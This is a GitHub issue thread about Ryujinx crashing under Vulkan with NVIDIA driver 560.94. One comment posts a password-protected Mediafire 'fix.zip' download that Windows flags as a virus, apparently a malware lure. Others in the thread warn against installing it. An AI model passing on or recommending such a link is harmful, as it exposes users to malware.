### ISSUE TITLE
[Bug] Vulkan crashes with latest nvidia drivers 560.94 (tested version 1.1.1374 to 1.1.1380)

### ISSUE THREAD

**Issue by Endymi0n74** [Ryujinx/Ryujinx#7250]
### Description of the issue

Vulkan crashes with latest nvidia drivers 560.94 (tested version 1.1.1374 to 1.1.1380)

### Reproduction steps
launch any game with my RTX 3070 in vulkan with latest nvidia drivers 560.94 > crashes
tested with integrated apu AMD and it works
if i change to opengl it works

log pinned

### Log file

[Ryujinx_1.1.1380_2024-08-28_08-25-00.log](https://github.com/user-attachments/files/16777279/Ryujinx_1.1.1380_2024-08-28_08-25-00.log)

### OS

windows 11

### Ryujinx version

1.1.1374 to 1.1.1380

### CPU

Ryzen 7600

### GPU

RTX 3070

### RAM

64 Go

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Endymi0n74** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

![ApplicationFrameHost_PnJ6IjZwlM](https://github.com/user-attachments/assets/43a67484-c5ac-4e5e-af7b-1524e480e1b0)

thx but windows says the exe is a virus

**Comment by Endymi0n74** [comment]
forced windows to accept. i must be dumb but which installer menu do you mean

**Comment by Endymi0n74** [comment]
> > forced windows to accept. i must be dumb but which installer menu do you mean
> 
> Please don't install that.

i removed everything already without launching , i can't be careless even if i just woke up
